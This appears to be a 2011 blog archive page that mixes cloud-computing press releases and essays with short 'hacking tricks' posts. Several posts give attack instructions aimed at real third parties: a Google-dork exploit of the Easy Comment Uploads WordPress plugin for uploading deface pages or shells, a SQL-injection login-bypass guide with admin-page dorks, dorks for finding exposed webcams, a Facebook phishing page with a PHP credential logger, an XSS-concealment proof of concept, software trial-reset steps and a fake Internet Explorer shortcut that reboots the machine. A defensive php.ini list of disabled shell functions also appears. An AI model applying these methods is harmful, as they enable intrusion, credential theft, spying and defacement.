Articles

Affichage des articles du octobre, 2011

Bangalore Embodies The Silicon Valley

Image
I spent a few days in Bangalore this month. This place amazes me every single time I visit it. Many people ask me whether I think Bangalore has potential to be the next Silicon Valley. I believe, it's a wrong question. There's some seriously awesome talent in India, especially in Bangalore. Don't copy the Silicon Valley. There are so many intangibles that Bangalore won't get it right. And there's no need to copy. Create a new Silicon Valley that is the best of both worlds. If you want some good reading on what makes silicon valley the Silicon Valley, read the essay " How to be Silicon Valley " by Paul Graham. Bangalore does have some of these elements - diversity, clusters, a large number of expats etc. It's quickly becoming a true cosmopolitan city in India. You don't need to know the local language (Kannada) to live there. It does have a few good colleges such as IIM and IISC, but no IIT. The real  estate boom in Bangalore is a clear indicator of...

How to bypass trial period of software's !!

1.Uninstall the application 2. Go to Start Type "Regedit". 3.Go to HK Local Machine > Software > Your Software name. Delete the Key. Do this for HK Current user if there exists a key of that software. 4.now you have to go to run type %temp% and delete all the files which exists,They are just some temporary files,It wont matter much. 5.Go to Users > Username > Appdata and then Check all 3 directories that is "Local", "LocalLow", "Roaming" for your software entry. Delete that. Now all you have to do is re-install the program and enjoy the evaluation period again! Note: It works for most of the  party software only .     

NJVC® Cloud Computing Expert Kevin Jackson to Speak at NIST Cloud Computing Forum & Workshop IV on Nov. 3 in Gaithersburg, Md.

Image
VIENNA, Va. , Oct. 28, 2011 — NJVC ® , one of the largest information technology solutions providers supporting the U.S. Department of Defense (DoD) , is pleased to announce that Kevin Jackson, general manager, cloud services, will participate in the “Security Assumption Buster Panel”  during the National Institute of Standards and Technology (NIST) Cloud Computing Forum & Workshop IV on Nov. 3 in Gaithersburg, Md.   Security Assumption Buster Panel   Date:  Nov. 3, 2011 Time:   11:40 a.m. – 12:40 p.m. Location:  NIST, 100 Bureau Drive, Gaithersburg, Md. Presenters:   Curt Barker , panel chair and  chief cybersecurity advisor, NIST Kevin Jackson , general manager, cloud services, NJVC Bill Newhouse , scientific advisor, cybersecurity, research & development computer security division, NIST This expert panel will address common fallacies and misconceptions about cloud computing security and also discuss the NIST approach to risk ma...

Make To Think And Think To Make

Image
I'm a passionate design thinker and I practice design thinking at any and all opportunities. Design thinking is part art and part science. John Maeda is one of my favorite thought leaders on design. He published a post talking about art as a form of asking "what do I want to know" rather than "what do I want to say." As a product manager, making a product goes from what do I want to know — the requirements — to what do I want to say — manifestation of the requirements into a working product. I call it "Make to think and think to make". I make prototypes — make to think — similar to a form of an art, to help me think and ask the right questions to fulfill my needs of "what I want to know". The human beings better respond to tangible artifacts as opposed to abstract questions. These conversations stimulate my thinking to execute on those requirements — "think to make" — similar to "what do I want to say." The design thinkin...

WordPress Easy Comment Upload Vunerablity :

  Google Dork : "inurl:/wp-content/plugins/easy-comment-uploads/upload-form.php"  Open Google and enter the  dork  Given,  Now select any website  and goto this url site.com/wp-content/plugins/easy-comment-uploads/upload-form.php You'll Got Upload Option here :) Now Upload Your Deface page .... and check it here site.com/wp-content/uploads/2011/10/yourfilename. Note: Different website support different option to upload like txt,jpg, jpeg .             you can also upload your shell in some website .. :-)   

Shut Down system by double Clicking on Internet Explorer !!!

Double click on Internet explorer to Restart the Computer: 1) Goto Desktop 2) Right click > new > Shortcut 3) In “Type the Location of the item” > write: “C:\WINDOWS\system32\shutdown.exe -r -t 00″ without coutes. 4) Click next and in “Type a name for this shortcut” write ” Internet Explorer” and click Finish. 5) Now Right Click on the shortcut of Internet Explorer and goto “Change Icon” and select the icon of Internet Explorer. 6) Now Virus is Ready….. check it out.. when you will double click on Internet Explorer Shortcut… Computer will Restart. 7) This is just  a Prank… don’t Misuse it..

How to make a folder with name “con” ?

"CON" is the system keyword and you can't create it using normal method. Just try cmd . Folder with Name "con" Goto command Prompt, Goto the location where you want to make the folder with name “con”. write the command: mkdir \\.\e:\con To remove the folder again: rmdir \\.\e:\con

Conceal XSS Injection in HTML5

history.pushState() was introduced in HTML5 and it’s meant for modifying history entries. By using pushState() we’re allowed to alter the visible URL in address bar without reloading the document itself The Harmful Part : - The harmful part is that we can conceal the real location and replace it with anything we want. Although the hostname can’t be replaced, we can completely change the pathname. so, I made a brief PoC about hiding a non-persistent XSS exploit. It’s about executing a malicious script on a login page through a non-validated query parameter (quite common situation). The script redefines form.action and then removes the malicious query parameters of the URL shown in address bar. Proof of Concept : - This PoC works only in modern browsers that has implemented this HTML5 proposal. This only works in Google Chrome 9 and Firefox 4 Beta. pushState() works properly also in Safari 5, but it’s security control refuses to load external scripts or execute injected scripts. I’ll inj...

Online SQLI Scanning Website !!

You can use all these website for online SQLI Scanning. For these you will need a Little Knowledge of  SQL Injection     http://www.be007.gigfa.com/scanner/scanner.php     http://scanner.drie88.tk/     http://localvn.biz/Tools/tools/Hack-Shop/SQLI-Scan     http://wolfscps.com/gscanner.php

How to Hide text behind images ? (Stegonography)

Step 1 Copy an image file to c: of your computer. Step 2 Copy the text(which you want to hide) to clipboard, by writing it in notepad and selecting it, right clicking it, then copy. Step 3 Open cmd, by going to Start — All Programs — Accessories — Command Prompt. Step 4 In cmd type : cd \ echo “your text to hide” >> “image.jpg”. Step 5 Now right click on image.jpg — Open with — Notepad. You can see your hidden text at the end of your image file contents.

How to find who is Invisible on Yahoo messenger ?

Image
Sometimes some of your friends who appear offline in yahoo messenger may not be actually offline, they may in the ‘Invisible’ mode. This maybe if they are trying to ignore you or are too busy to talk to anyone. There is this small trick that you can use to find out what the truth is. Firstly open your yahoo messenger main window and double click on the name of the person whom you want to check. The chat window will open obviously. Click IMVironment button, select See all IMVironments, select Yahoo! Tools or Interactive Fun, and click on Doodle. After loading the Doodle imvironment there can be two possibilities 1.If the user is offline Doodle are will show this “waiting for your friend to load Doodle” continuously .See in the picture below: 2. If the user is online (but in invisible mode), after few seconds (it can take up to one minute, depending on your connection speed), you should get a blank page like in the picture below. So you know that the user is online.

How to Reset the Ubuntu Password....

Reset Your Ubuntu Password Reboot your computer, and then as soon as you see the GRUB Loading screen, make sure to hit the ESC key so that you can get to the menu. Root Shell – Easy Method If you have the option, you can choose the “recovery mode” item on the menu, usually found right below your default kernel option. Then choose “Drop to root shell prompt” from this menu. This should give you a root shell prompt. Alternate Root Shell Method If you don’t have the recovery mode option, this is the alternate way to manually edit the grub options to allow for a root shell. First you’ll want to make sure to choose the regular boot kernel that you use (typically just the default one), and then use the “e” key to choose to edit that boot option. Now just hit the down arrow key over to the “kernel” option, and then use the “e” key to switch to edit mode for the kernel option. You’ll first be presented with a screen where you can find this written “ro single” You’ll want to remove the “r...

Firefox Shortcut

As we know Mozilla Firefox is very popular amongst all the browsers. It has lots of shortcut, so here in this post I am going to show you the shortcuts available in mozilla firefox. Double-click (On a word)                                   Select the word. Triple-click                                                              Select entire line. Wheel click                                                              Activate the Smooth scrolling Hold Ctrl + Scroll Wheel forward                   Increase font size Hold Ctrl + Scroll Wheel backward               Decrease font size Click one end, hold Shift & click another    Create a selection from the two points F5                                                                                 Refresh. F6                                                                                 Move focus to address bar. F11                                                                               Toggle on/off full-screen mode Alt...

Branding Windows Xp with your Name and Details...

Open notepad--> copy the lines [General] Manufacturer=Your Name Here Model=Your Model Here [Support Information] Line1=Your Name Here Line2=Your Address Here Line3=Your Email Address Here   SAVE it with the name OEMINFO.INI in the c:\windows\system32  Then make a right click on my computer select properties, in the general tab a button will be highlighted (support information) make a click on it, you will be able to see the changes. Now if you want to display some more information then simply increase the line in the file. ex: Line4=Your Working Hours Here

Chat with Friends through Command Prompt...

All you need is your friend's IP Address and your Command Prompt.  Open Notepad and write this code as it is.....! @echo off :A Cls echo MESSENGER set /p n=User: set /p m=Message: net send %n% %m% Pause Goto A  Now save this as " Messenger.Bat ". Open Command Prompt. Drag this file (.bat file) over to Command Prompt and press Enter. Now, type the IP Address of the computer you want to contact and press enter  Now all you need to do is type your message and press Enter.            Start Chatting.......!

NJVC® General Manager, Cloud Services, Kevin Jackson to Moderate “Cloud Computing and the Intelligence Mission” Panel at GEOINT 2011 Symposium

Image
Vienna, Va., Oct. 13, 2011 — NJVC ® , one of the largest information technology (IT) solutions providers supporting the U.S. Department of Defense, is pleased to announce that Kevin Jackson, General Manager, cloud services, will serve as the moderator for the GEOINT 2011 Symposium panel, “ Cloud Computing and the Intelligence Mission ,” on October 19 in San Antonio.   Event: “ Cloud Computing and the Intelligence Mission ” panel Date: Wednesday, Oct. 19, 2011 Time: 2 – 4 p.m. (central) Location: Room 103, Henry B. Gonzalez Convention Center, San Antonio   Panelists: Don Cotter, CTO, Department of Homeland Security Bob Gouley , Editor, CTOvision.com Dr. Robert C. Norris, Director, Enterprise Architecture and Atandards, National Geospatial-Intelligence Agency Michele Weslander Quaid , Chief Technology Officer and Innovation Evangelist, Google Federal Description:   Cloud computing, a new approach in the provisioning and consumption of IT, has been described as a means to cut federal IT...

NOKIA Secret Codes

*** WARNING: Using secret codes may be harmful to your phone and result in disabling or worse. Use these codes at your own risk, we are not responsible  for blocked pones while using these codes!!!   IMEI Number *#06# Cells Identity Code (IMEI = International Mobile Equipment Identity) XXXXXX XX XXXXXX X TAC FAC SNR SP TAC = Type Approval Code (first 2 digits = country code of the approval-country ) FAC = Final Assembly Code: (01,02 = AEG) (10,20 Nokia) (40,41,44 Siemens) (30 Ericsson) (50 Bosch) (51 Sony,Siemens,Ericsson) (60 Alcatel) (65 AEG) (70 Sagem) (75 Dancall) (80 Philips) (85 Panasonic) SNR = Serial Nr. SP = Spare (always "0" Software Version  *#0000# shows the software version Signal Processing *3370# - Enchanced full Rate Codec (EFR) activation. It will automatically restart. #3370# - Enchanced full Rate Codec (EFR) deactivation *4720# - Half Rate Codec activation. It will automatically restart. #4720# - Half Rate Codec deactivation Enchanced Full Rate will give yo...

Skip or bypass Rapidshare, Megaupload Waiting time...

Now you can easily avoid the waiting time or usually we say time limit when you download as a free user from the file sharing services such as rapidshare, megaupload, deposifiles, hotfile. Normally you have to wait for 20-60 minutes to download the second file after downloading the first one. They implement ways to invite users to purchase a premium service. But this way of limiting Free download limit and asking free users to wait for long time to start another download can be annoying one. Skipscreen is an extension to browser to by pass waiting time on download. Unfortunately it can only be used with Firefox browsers to avoid waiting time while downloading files from some popular File hosting services like: * Rapidshare.com * zShare.net * MediaFire.com * Megaupload.com * Sharebee.com * Depositfiles.com * Sendspace.com * Divshare.com * Linkbucks.com * Uploaded.to * Hotfiles.com * 4shared.com * Limelinx.com * Link-Protector.com Its use is very simple and does not require any...

NJVC® Spotlights Cyber Security and Automated IT at Gartner Symposium/ITxpo® 2011

Image
VIENNA, Va., Oct. 4, 2011 — NJVC ® , one of the largest information technology solutions providers supporting the Department of Defense , announces its lineup for the Gartner Symposium/ITxpo ® , Oct. 16 - 20 at the Walt Disney World Dolphin Hotel in Orlando, Fla. Visit the NJVC booth (#206) on the tradeshow floor to meet with company representatives and earn about NJVC’s extensive and proven portfolio of IT solutions for government and commercial customers. NJVC will provide the following live demonstrations for attendees: Cyber Dashboard – Take a tour and learn how NJVC customers have benefited from this inexpensive yet highly effective cyber tool that provides customizable, real-time situational awareness visualization across an entire IT enterprise. S treamlined NJVC Automation Products, Services and Solutions™ – SNAPSS™ is a suite of cost-effective solutions that automate and streamline IT enterprise services for customers no matter the location of their users. ...

Trojan Removal - A General Process

Trojan Removal - A General Process   If you are using and operating systems such as Windows XP or ME, you MUST disable your System Restore before attempting any removal! After successful removal, you can re-enable System Restore. Here is how to turn off System Restore:   For Windows ME Right-click the My Computer icon on the Desktop and click Properties. Click the Performance tab. Click the File System button. Click the Troubleshooting tab. Select Disable System Restore. Click Apply > Close > Close. When prompted to restart, click Yes. Press F8 while the system restarts. Choose Safe Mode then hit the Enter key. After your system has restarted, continue with the scan/clean process. Files under the _Restore folder can now be deleted. Re-enable System Restore by clearing Disable System Restore and restarting your system normally.  For Windows XP Log on as Administrator. Right-click the My Computer icon on the desktop and click Properties. Click the System Restore tab. Select Turn of...

How to hack a website using Authentication bypass.

Basic sql injection Gaining authentication bypass on an admin account. First we need to find a site, start by opening Google. Now we have to use Google dork: There is a large number of Google dork for basic sql injection. here is the best: "inurl:admin.asp" "inurl:login/admin.asp" "inurl:admin/login.asp" "inurl:adminlogin.asp" "inurl:adminhome.asp" "inurl:admin_login.asp" "inurl:administratorlogin.asp" "inurl:login/administrator.asp" "inurl:administrator_login.asp" "inurl: admin.php" "inurl: login/admin.php" "inurl: admin/login.php" "inurl: adminlogin.php" "inurl: adminhome.php" "inurl: admin_login.php" "inurl: administratorlogin.php" "inurl: login/administrator.php" "inurl: administrator_login.php" Now what to do once we get to our site. the site should look something like t...

NJVC® to Demonstrate Enterprise Automation at GEOINT 2011

Image
VIENNA, Va., Oct. 6, 2011 — NJVC ®, one of the largest information technology solutions (IT) providers supporting the U.S. Department of Defense (DoD), is pleased to offer live, compelling demonstrations on the company’s Streamlined NJVC Automation Products, Services and Solutions™ (SNAPSS™) at GEOINT 2011 Symposium —the largest intelligence event in the United States—on Oct. 16 – 19 at the Henry B. Gonzalez Convention Center in San Antonio. Visit the NJVC booth (#601) on the expo floor to meet company experts and learn about NJVC’s extensive and proven portfolio of IT services , particularly geared for DoD and intelligence customers. Experience the following thought-provoking demonstrations: SNAPSS™ – SNAPSS™ is a suite of cost-effective solutions that automate and streamline IT enterprise services for customers no matter the location of their users. Persistent Desktop Instance™ – Discover NJVC’s new service—PDI™— a virtual desktop available from “thick” customers (desktops or laptop...

Access the Webcams online using google dorks .

Axis: inurl:"view/indexFrame.shtml" inurl:"view/index.shtml" intitle:"Live View / - AXIS" intitle:axis camera intitle:"axis #Kameramodell#" Canon: inurl:sample/LvAppl/ JVC: intitle:"V.Networks [Motion Picture(Java)" EvoCam intitle:"EvoCam" inurl:"webcam.html" WebcamXP: intitle:"my webcamXP server!" MOBOTIX: inurl:/control/userimage.html Panasonic: inurl:/ViewerFrame?Mode=Motion FlexWatch: inurl:toolam.html inurl:viewash.html Toshiba: intitle:"TOSHIBA Network Camera - User Login" Sony: inurl:/home/homeJ.html And Some Others inurl:/view.shtml intitle:”Live View / - AXIS” | inurl:view/view.shtml^ inurl:ViewerFrame?Mode= inurl:ViewerFrame?Mode=Refresh inurl:axis-cgi/jpg inurl:axis-cgi/mjpg (motion-JPEG) inurl:view/indexFrame.shtml inurl:view/index.shtml inurl:view/view.shtml liveapplet intitle:”live view” intitle:axis intitle:liveapplet allintitle:”Network Camera NetworkCamera” intitle:axis intitle:”v...

How to download books from Google books for Free?

Step 1: Download/install Greasemonkey addon(Customize the way a web page displays or behaves, by using small bits of JavaScript.) in Firefox Install this userscript : google book download Download/insall the Flashgot (FlashGot is the free add-on for Firefox and Thunderbird, meant to handle single and massive ("all" and "selection") downloads with several external Download Managers. ) Download/install Flashget (Download Manager) Step 2: View your favorite book. For Example: http://books.google.com/books?id=Tmy8LAaVka8C&printsec=frontcover In the left panel, click Download this book Select all pages, right-click, choose FlashGot Selection Press OK to start downloading. Note : Download only one page at a time, or your IP will be banned After the downloading is finished, in FlashGet, left panel, choose Downloaded folder. Select all pages of the book, right-click, choose Rename -> Comment As Filename Read book

How to Hack Facebook Account Using Phishing webPage

Image
Phishing WebPage:      Creating web page which look like any site is described as Phishing.  By creating Phishing Web Page, you can make users to believe that it is original website and enter their id and password. Step 1: Go to Facebook.com Right click on the white space of the front page.  Select "View Page source". Copy the code to Notepad. Step2: Now find (Press ctrl +f)  for "action="  in that code. You fill find the code like this:   The big red ring that circles the action= you have to change. You have to change it to 'action="a.php" '. after you have done that, you should change the method (small red circle on the picture) to "get" instead of "post", or else it will not work. Save the document as index.html Step 3: Now we need to create the "a.php" to store the password.  so open the notepad and type the following code: header("Location: http://www.Facebook.com/login.php "); $handle = fopen(...

Is your computer “male” or “female”?

1. Open Notepad 2. Type the following line in notepad: ... CreateObject("SAPI.SpVoice").S peak"I love you" 3. Save file as computer_gender.vbs 4. Run the file. If you hear a male voice, your pc is a boy If you hear a female voice, your pc is a girl...try it guyz.......!!! its amazin !!!

Secret Codes For iPhones

Following are the secret codes for your i phone 1) *3001#12345#* and tap Call. Enter Field Mode.Field mode reveals many of the inner settings of your iPhone, specifically up-to-date network and cell information. 2) *#06# Displays your IMEI. No need to tap Call.IMEI is the unique identifier for your cell phone hardware. Together with your SIM information it identifies you to the provider network. 3) *777# and tap Call. Account balance for prepaid iPhone. 4) *225# and tap Call. Bill Balance. (Postpaid only) 5) *646# and tap Call. Check minutes. (Postpaid only)These three are pretty self explanatory. 6) *#21# and tap Call. Setting interrogation for call forwards.Discover the settings for your call forwarding. You’ll see whether you have voice, data, fax, sms, sync, async, packet access, and pad access call forwarding enabled or disabled. 7) *#30# and tap Call. Calling line presentation check.This displays whether you have enabled or disabled the presentation of the calling line, presu...

How to secure your server from PHP Shells!

Adding these code in your  php.ini  file will protect your server from execution of Shells like c99,r57 or  b374k . disable_functions = php_uname, getmyuid, getmypid, passthru, leak, listen, diskfreespace, tmpfile, link, ignore_user_abord, shell_exec, dl, set_time_limit, exec, system, highlight_file, source, show_source, fpaththru, virtual, posix_ctermid, posix_getcwd, posix_getegid, posix_geteuid, posix_getgid, posix_getgrgid, posix_getgrnam, posix_getgroups, posix_getlogin, posix_getpgid, posix_getpgrp, posix_getpid, posix, _getppid, posix_getpwnam, posix_getpwuid, posix_getrlimit, posix_getsid, posix_getuid, posix_isatty, posix_kill, posix_mkfifo, posix_setegid, posix_seteuid, posix_setgid, posix_setpgid, posix_setsid, posix_setuid, posix_times, posix_ttyname, posix_uname, proc_open, proc_close, proc_get_status, proc_nice, proc_terminate, phpinfo,system,passthru,shell_exec,escapeshellarg,escapeshellcmd,proc_close,proc_open,ini_alter,dl,popen,popen,pcntl_exec,socket_acce...

Mr. Jeffrey Kaplan Talks About The Cloud Channel

Image
This afternoon I had a very interesting discussion with Mr. Jeffrey Kaplan , Managing Director of THINKstrategies and founder of the Cloud Computing Showplace. His firm is focused entirely on the business implications of the transition of the technology industry from product-centric to services-driven solutions, including Software-as-a-Service (SaaS), Cloud Computing and Managed Services. Mr. Kaplan is also the Founder of the Cloud Computing Showplace (www.cloudshowplace.com), a vendor-independent, online directory and best practice resource center regarding SaaS, Platforms-as-a-Service (PaaS), and Infrastructure-as-a-Service (IaaS), including Managed Services with nearly 1,800 companies divided into over 90 categories.   Our conversation focused on the evolution of the system integrator within the public sector marketplace. One of his key goals was to dispel the myth that system integrators and their channel partners will be displaced by the rapidly growing list of cloud providers. In...

The Economic Benefit of Cloud Computing

Image
(The following is the Executive Summary of a recent NJVC Executive Whitepaper. The full version is available at NJVC.com ) Cloud computing, as defined by the National Institute of Standards and Technology , is a model for enabling “… convenient, on-demand network access to a shared pool of configurable computing resources (e.g., networks, servers, storage, applications and services) that can be rapidly provisioned and released with minimal management effort or service provider interaction.” NIST is implying the economies of scale that go with cloud computing when it refers to a pool of configurable computing resources. Cloud computing is often referred to as a technology. However, it is actually a significant shift in the business and economic models for provisioning and consuming information technology (IT) that can lead to a significant cost savings. This cost savings can only be realized through the use of significant pooling of these “configurable computing resources” or resource...